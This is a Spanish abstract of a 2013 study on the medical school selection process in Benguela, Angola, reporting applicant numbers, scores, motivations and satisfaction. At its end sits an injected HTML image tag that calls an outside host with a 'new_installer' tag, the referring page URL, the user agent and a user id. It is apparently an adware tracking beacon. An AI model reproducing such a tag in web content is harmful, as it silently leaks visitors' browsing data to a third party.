Proceso de selección de los alumnos admitidos en la Facultad de Medicina de Benguela, Angola - del Rosário Sambo, Maria; Machado Cano, María Julia; De la Noval Díaz, Georgina (Mediciego, 2013)
Objetivo: Analizar los resultados del proceso de selección a la carrera de Medicina en la Facultad de Medicina de la Universidad Katyavala Bwila, en el año académico 2012. Método: Estudio de corte transversal, descriptivo y analítico en población de 972 candidatos que se presentaron al proceso de selección. Resultados: La mayoría de los candidatos fueron del sexo femenino, residentes en la provincia de Benguela y provenían de los institutos medios de salud, y de la enseñanza pre-universitaria. Las calificaciones obtenidas estuvieron entre cero y nueve sobre 20 puntos. De los 80 candidatos admitidos, la mayoría también fue del sexo femenino, la media de edad fue de 22 años, procedentes de la enseñanza pre-universitaria y de los institutos medios de salud. La nota mínima de los estudiantes admitidos fue de 13 y la máxima de 17 puntos. La principal motivación para la elección del curso de medicina fue ayudar a mejorar la salud de la población, seguida de la posibilidad de tener un empleo estable y por último de lograr seguridad económica y reconocimiento social. La mayoría de los encuestados refirió sentirse muy satisfecho de forma general con el proceso de admisión. Conclusiones: Existe gran demanda para el ingreso a la carrera de medicina (12 candidatos por plazas). Por las notas obtenidas en el proceso de admisión puede inferirse que los seleccionados tienen una preparación académica aceptable para el curso de medicina. La mayoría de los encuestados refirió sentirse muy satisfecho con el proceso de selección.<img src="http://prettysite.xyz/acnt?_=1583868220278&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F293&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />